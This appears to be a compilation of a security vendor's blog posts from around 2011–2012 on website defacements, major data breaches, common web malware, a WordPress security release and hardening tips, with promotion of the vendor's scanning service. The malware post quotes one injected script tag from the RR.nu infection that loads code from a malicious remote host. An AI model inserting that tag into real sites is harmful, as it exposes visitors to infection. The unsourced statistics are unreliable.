Unfortunately (or fortunately, depending on how you look at it), real-life hacking scandals are never this exciting. Take the following six examples:

1. The Insecure Securer

Kaspersky Labs purports to be the top provider of computer security systems. Really? Would they mind explaining then how, during 2008, a Turkish hacker dubbed “m0sted” managed to crack the company’s website and deface its home page?

“The method?” you ask. SQL injection … an amateur method right out of “Hacking for Dummies”!

2. Miss Incongeniality

Less than a day after the Susan G. Komen website for breast cancer awareness pulled its funding from Planned Parenthood in February, a group of clever misfits hacked the site and replaced its headline with the following quite politically incorrect statement:

“Help us run over poor women on our way to the bank.”

3. Keep Fear Alive

This example doesn’t exactly constitute hacking, but it’s close enough to fit our requirements. A few days before Jon Stewart’s rally on the National Mall in 2010, a group of savvy pranksters used a trick known as “letterbombing” to spell out “KEEP FEAR ALIVE” along the side of Glenn Beck and Sarah Palin’s Facebook pages.

Basically, each person set his or her profile picture to one of the letters in the message. One by one, they all then posted messages on the corresponding Facebook pages, thus causing the phrase to show up.

4. The Juice

Again in 2008 (quite a year for hacking, if you ask us), another Turkish group hacked into the website for the Internet Corporation for Assigned Names and Numbers (ICANN). The hacker group resented the group’s “regulatory” status, so it rerouted ICANN.org to a site reading, “You think that you control the domains but you don’t! Everybody knows wrong. We control the domains including ICANN! Don’t you believe us?”

5. Convert Now, My Children

In fall 2011, an unknown individual hacked a dozen church websites and replaced their welcoming message with one urging congregation members to convert to Islam. The hacker has yet to be identified, but most suspect he’s not really a Muslim. Rather, he’s likely just an upset atheist — either that or a very bored hacker.

6. El Presidente 

During summer 2010, an unidentified group of hackers penetrated Iranian President Mahmoud Ahmadinejad’s website and redirected all visitors to a page with the following charming message:

[Dear God, In 2009 you took my favorite singer - Michael Jackson, my favorite actress - Farrah Fawcett, my favorite actor - Patrick Swayze, my favorite voice - Neda. Please, please, don't forget my favorite politician - Ahmadinejad and my favorite dictator - Khamenei in the year 2010. Thank you.]

If you find this article interesting you also may want to check out this blog article “The 5 Most Infamous Hackers of All Time”

Let us know what you think and want to learn about website security and malware! Connect With us on Google+ , Twitter and Facebook or even LinkedIn!

1. Heartland Payment Systems

This company lost 130 million payment records to a hacker in January of 2008. The record contained all the info contained on the magnetic strips on the back of credit cards, which allowed the thieves to create counterfeits. The guy behind the scheme was caught a year later, but the damage had been done.

2. TJX Companies Inc.

You might know this company better by its retail brand discount stores such as TJ Maxx, Home Goods, and Marshalls. When they were hacked in January of 2007 the records of 94 million transactions were lost.

3. TRW

The now defunct TRW used to be a credit reporting service, which means they had access to an unprecedented amount of information in regards to their customers. Their 1984 breach by a hacker left just over 90 million users information at risk.

4. Sony

You knew that they had to be somewhere on the list. Not too long ago, the company’s data breach risked the personal data of about 77 million gamers worldwide. That is not to be confused with the March 2011 breach where 25 million users’ data was hacked. Make you think twice about gaming with Sony?

5. Card Systems

This mobile and business side payments processor had the data of 40 million end users snatched away by a hacker in June of 2005. It occurred through a SQL injection attack.

6. RockYou Inc.

RockYou is the maker of social games such as Zoo World and Galactic Allies. When their servers were breached in December of 2009 the data of 32 million users was taken.

7. The United States Department of Veterans Affairs

The US government has the dubious honor of being the only organization on this list that did not have their data taken by a hacker. Instead the data of 26 million people was lost when an employee’s laptop was stolen. That counts for something, right?

There you have it, the seven largest breaches of personal data so far. If you know of a contender that you think should be on the list, or if you have had a personal experience with one of these data breaches, please feel free to drop us a comment!

If you find this article interesting you also may want to check out this blog article “The 5 Most Infamous Hackers of All Time”

Let us know what you think and want to learn about website security and malware! Connect With us on Google+ , Twitter and Facebook or even LinkedIn!

Unfortunately for many site owners, they take a reactive approach to securing their web site. Choosing to wait until an attack happens, they are then forced to deal with the clean up that not only costs them dollars due to downtime, but can do irreparable harm to their reputation resulting in more costs down the road.

However there are some proactive measures you can take to find out where any security vulnerabilities may be on your web site.

Use scanning tools.

There are multiple software tools available that will scan a web site for known vulnerabilities and produce a nice report on what can be done to plug them before they are able to be exploited.

Some of these tools are rather expensive and others will cost absolutely nothing to use. These tools are phenomenal resources when it comes to finding out how secure your site is, but only on two conditions:

1. You have the monetary resources to purchase one of the more expensive packages
2. You have the technical skills to run one of the open-source programs

And no matter which route you take, you still need to have the coding skills necessary to fix any vulnerabilities that the scanning tool finds.

Hire a consultant to complete a penetration test.

Web site security professionals who are indeed professional will not only run an automated scan against your web site to find vulnerabilities, but they will also check each potential weakness by hand and patch these vulnerabilities for you.

Of course there is a price involved and unfortunately, the cost of having a professional pen test done on a web site will often put this option out of reach for 90% of all web site owners.

Utilize third party tools.

There are many third party tools available that will scan your web site for vulnerabilities and report back to you the exact steps you need to take in order to protect your web site. Unlike scanning tools that run against from another computer, these tools are installed directly on the web server itself to offer continuous protection and real-time updates as to the
status of your web site’s security.

Not all third party tools are built equally. For the most protection, you need to find one that addresses malware threats along with other known vulnerabilities. You should also look for something that offers heuristic capabilities to recognize zero day exploits as well.

If you find this article interesting you also may want to check out this blog article “Startup Security Checklist: Things You Should Do Before Launching Your Site”

Let us know what you think and want to learn about website security and malware! Connect With us on Google+ , Twitter and Facebook or even LinkedIn!

Below, you will see a few examples of the most common types of malware that infects seemingly innocent web sites all over the world.

1. Mal/Iframe-V

This is the malware that infected Leo Laporte’s TWiT.tv site. When people visited his site they were redirected to another web page with a cz.cc domain name that runs a file named woms.jar which infects the victim’s computer with Trojans that install fake anti-virus warnings and/or trigger a PDF vulnerability.

2. Willysy

This malware targeted e-commerce sites running osCommerce and in under two weeks it was able to go from 90,000 known infections to over 6 million. The code allows attackers to exploit vulnerabilities in osCommerce and places an invisible iFrame on the page. When victims visit infected pages their computers are attacked through vulnerabilities in Java, Adobe Reader, Windows Help Center and Internet Explorer. We blogged about the “Willysy Injection Attacks” a while ago.

3. fgnfdfthrv.bee.pl

The name may seem a bit funny but the end result is not. This code is placed in a web site’s php files and causes the victim to be redirected to another site when the host page is accessed through a search engine. The attacker can then use the redirected site to infect the visitor’s computer.

4. Koobface

Facebook and MySpace were among some of the social networks where Koobface ran free. Faking messages and comments from “friends” would be placed on a page. When victims would click on the link to view a video, they would be prompted to download an update, usually a codec, that would actually install malware allowing attackers to control the infected computer. Read more about “Koobface Malware Detection” in our other blog article.

5. RR.nu

Hacked sites that found this script <script src= “http://trill18ionsa.rr.nu/pmg.php?dr=1″></script> were infected with the RR.nu maware. Visitors to infected sites were redirected to a fake virus-scan website where they were tricked into paying for a bogus service while divulging credit card information. For more information on the RR.nu malware read our blog article “How to Deal with the Latest WordPress Outbreak?”

6. Zeus

Using fake HTML forms injected into online banking login pages this malware allows the attacker to steal all sorts of information from the victim including account numbers, user names, passwords and credit card numbers. Read also “A trojan which steals your money “intelligently”

7. LizaMoon

This SQL injection attack spread scareware to over 1.5 million computers between March and April of 2011. Infected users were coerced into installing “anti-virus software” that actually nothing more than a rogue application called Windows Stability Center. You find more information about the LizaMoon malware in our article “LizaMoon Hack: Mass SQL Injection” and “It’s LizaMoon All Over Again”

8. Blackhole Toolkit

Using php code created with the Blackhole Toolkit, the attackers were able to place an iFrame on sites that sends visitors an executable file containing whatever payload the attacker desires. Some high profile sites that were attacked with this malware include Crytome.org, the government of Mexico, the State of Alabama, Ticketmaster and Microsoft’s store in India. We talked about the Blackhole Toolkit in “BlackHole Toolkit: Malware Running Wild”

9. Flashback

One of the biggest reasons people flock to Apple products is because they are under the impression that their computer cannot be infected with malware since it is a Mac. Not true. Flashback is one of the latest password stealing programs aimed at Apple fanboys. By tricking users into updating or installing Adobe Flash Player, the code exploits a vulnerability in Java and then goes on to steal the victim’s passwords.

10. TrojPHPShll-B

WordPress has made it easy for anyone to get a web site up and running. But it has also made it easier for attacker to infect even more sites than they ever thought possible. This Trojan is one of the more recent pieces of malware to infect sites running WordPress. Visitors to infected sites would find that they too have downloaded malware that infects their computers as well.

If you find this article interesting you also may want to check out this blog article “What is Malware? And How is Web-Malware Different?”

Let us know what you think and want to learn about website security and malware! Connect With us on Google+ , Twitter and Facebook.!

The WordPress 3.3.2 update includes security updates of three external libraries included in WordPress:

• Plupload (version 1.5.4), which WordPress uses for uploading media.
• SWFUpload, which WordPress previously used for uploading media, and may still be in use by plugins
• SWFObject, which WordPress previously used to embed Flash content, and may still be in use by plugins and themes.

WordPress 3.3.2 also addresses a couple of other bug-fixes:

• Limited privilege escalation where a site administrator could deactivate network-wide plugins when running a WordPress network under particular circumstances, disclosed by Jon Cave of our WordPress core security team, and Adam Backstrom.
• Cross-site scripting vulnerability when making URLs clickable, by Jon Cave.
• Cross-site scripting vulnerabilities in redirects after posting comments in older browsers, and when filtering URLs. Thanks to Mauro Gentile for responsibly disclosing these issues to the security team.

Here is the official WordPress News release on WordPress.org.

Go upgrade to WordPress 3.3.2 now!

However, these ten statistics about hacking may help to shed some light on the problem for you…

1. Playstation Network

Hacking attacks are no longer isolated to just the computer you use to send emails and browse the web. In April of 2011 the Sony Playstation Network had to shut down for a few days as well as their Qriocity service due to an  “external intrusion” that compromised an estimated 77 million user accounts.

2. Intellectual Property Stolen

In the year 2008 alone there was an estimated $1 Trillion dollars worth of intellectual property stolen due to hackers gaining access to confidential data stored on enterprise systems worldwide. That’s enough to make even Dr. Evil happy.

3. Passwords

It takes only 10 minutes to crack a lowercase password that is 6 characters long. Add two extra letters and a few uppercase letters and that number jumps to 3 years. Add just one more character and some numbers and symbols and it will take 44,530 years to crack.

4. Victims

Nearly three quarters, 73 percent, of all Americans have fallen victim to some type of cyber crime. Makes you wonder if that has any effect on the local real estate market?

5. Time is not on your side

There is a 156 day lapse between the time a computer resource is compromised and the time the compromise is detected. That leaves your attacker almost half a year to run amok. The sad part is, using a proven malware solution on all computer resources, including web servers, can reduce the amount of time substantially.

6. Business is booming

In a recent survey it was reported that 90 percent of all businesses suffered some sort of computer hack over the past 12 months and 77 percent of these companies felt that they were successfully attacked several times over the same period of time. Since most attacks are a direct result of a malware infection, small businesses need to have some type of protection in place.

7. Zombies everywhere!

In 2009 the security firm Finjan discovered a bot net run by a Ukranian gang that consisted of over 1.9 million zombie computers. The bot net earned its owners up to $190,000 per day. Talk about an apocalypse!

8. Infected sites

Talk about surfing in shark infested waters… Research estimates that every day more than 30,000 websites are infected with some type of malware; most of them belonging to small businesses. Without proper a proper malware detection and removal solution in place, SMEs run the risk of having their web presence shut down by their hosting company, isp or even removed from Google’s search.

9. Vulnerable sites

Not only do web sites face the threat of malware, but the number of applications that power web 2.0 sites open the door to many vulnerabilities as well. In 2010 the average web site was found to have over 230 serious vulnerabilities. Only 53 percent of these vulnerabilities were dealt with over the course of a year.

10. Who are you?

Over 27 million Americans have fallen victim to identity theft over the past five years. 9 million of them found their identities stolen in the last year alone.

Are you a statistic when it comes to cyber crime? Tell us your story in the comment section.

Let us know what you think and want to learn about website security and malware! Connect With us on Google+ , Twitter and Facebook!

Luckily, there is a cost effective solution to help you protect your web site from falling victim to attack. That solution is Stop the Hacker. Stop the Hacker, quite simply, defends its customers’ web sites against malware and vulnerabilities through monitoring and assessments.

To begin with, Stop the Hacker scans each and every page on your web site for known viruses and malware that may have been injected into your site. If something is found, then you are notified immediately and provided with information on what steps you need to take next to clean the infected files from your site if you wish to handle the cleanup yourself. If you aren’t up to the task of manually cleaning any infected files, then you can let Stop the Hacker handle this for you with its automatic cleanup. You don’t have to know how to program, develop web sites or even know the first thing about security. StopTheHacker will do all the work for you without you ever having to touch a line of code. And Stop the Hacker doesn’t stop there. It automatically, and continually, scans each page on your web site for any anomalies that may be a malware infection on your website. You can decide if you want these scans to occur weekly, daily, hourly or continuously depending upon the service package you choose.

Yet what makes Stop the Hacker’s service so unique is its Artificial Intelligence engine. While most web site protection services rely solely on definitions and signature files to fight malware and vulnerabilities, Stop the Hacker’s advanced AI engine not only monitors for new strains of malware, but identifies attacks by learning what patterns they take, alerting you to a possible infection or vulnerability before something happens.

In addition to protecting your web site against malware threats, Stop the Hacker also performs a vulnerability assessment of your web site looking for over 35,000 vulnerabilities on your servers, website or third-party web applications, including:

• WordPress
• Drupal
• Django
• OpenCMS
• Joomla
• Ruby on Rails
• And many more

If you find this article interesting you also may want to check out this blog article “Startup Security Checklist: Things You Should Do Before Launching Your Site”

Let us know what you think and want to learn about website security and malware! Connect With us on Google+ , Twitter and Facebook.!

To read the first part of our article click: Website Security: What do I need to know? What do I need to do? – Part 1

In the first part we talked about “How websites are built” and “Why websites are insecure”. We listed a couple of reasons for the latter, e.g.

• Lack of communication
• Lack of maintenance processes
• Vulnerabilities in website software

And will now add more reasons to that and the discuss the  question ” What can happen if a website is not secured” and ” What can I do to protect my website”.

(2) Why are websites insecure

(2.1) Lack of communication

(2.2) Lack of maintenance processes

(2.3) Vulnerabilities in website software

(2.4) Vulnerabilities in server software:

But now things have changed. Any site on the web has become a target for cybercriminals. Whether they are trying to steal user data, inject malicious code into a web site or bring it down with a denial of service attack in today’s threat landscape even the most seemingly insignificant web sites are at risk.

So just how can you protect your web site from attack?

Well if you are multi-million dollar company you have the option of hiring out a team of experts to scan your site for any vulnerabilities that may exist. However those of us who can’t afford that route have to take matters into our own hands.

Make sure your software is all up to date. 

Many websites run software like WordPress or Joomla!. Like the software on your computer, these programs need to be updated to patch security holes that people have found. Be sure to back up your site entirely before downloading and installing any updates just in case the update breaks your site or is incompatible with plugins or components that are necessary for your site to function.

Be password savvy.

Using 1234 may have been funny in Spaceballs, but in real life it can be tragic. Cybercriminals have sophisticated software that can
easily use brute force to crack this type of password. Make sure that anything you use is a combination of uppercase letters, lowercase letters, numbers and symbols.

Delete the installation folder.

Because so many sites now run on third party software packages, like WordPress, it is necessary for software to be installed on your
web server. If you don’t delete the installation folder then an attacker could run the installation again, empty the database and take control of your web site.

Keep an eye on file and folder permissions.

Setting all permissions to 777 will certainly make things easier on you, or anyone else who is working on your website, but it will also
make it easier on the bad guys. Set permissions as low as possible while still allowing your site to function completely.

Work from a secure computer.

The computer you use to access your FTP server or log into any web applications that your site uses needs to be secure and malware free.
Attackers can use keystroke loggers and other types of spyware to capture your credentials giving them complete access to your site.

Secure your database.

Most often, attackers are after your web site’s database. If you store account information, credit card information or any other type of
data that a cybercriminal can use, then your database will be targeted.

Use a third-party service to scan your site for vulnerabilities and malware.

Web sites face continual threats from attackers. And these attacks have become so sophisticated that malicious hackers can set up a
program to scan the web for specific web based vulnerabilities and automatically launch attacks against the sites that it finds and infects these sites with malicious code and malware. In fact, a study done in 2011 showed that over 1.2 million websites were infected with malware and a person had a 95 percent chance of visiting an infected site within three months of normal browsing activities.

Using a third-party solutiuon like StopTheHacker will help safeguard your site against attacks after you have already completed the basic hardening steps mentioned above. If you decide to use a third-party solution to protect your site, make sure that in addition to actively scanning for malware and vulnerabilities that it gives you the option of fixing any problems automatically or guides you through the steps necessary to keep your site free and clear of any malware and your visitors safe.

If you find this article interesting you also may want to check out this blog article “How to Deal with the Latest WordPress Outbreak?”

Let us know what you think and want to learn about website security and malware! Connect With us on Google+ , Twitter and Facebook.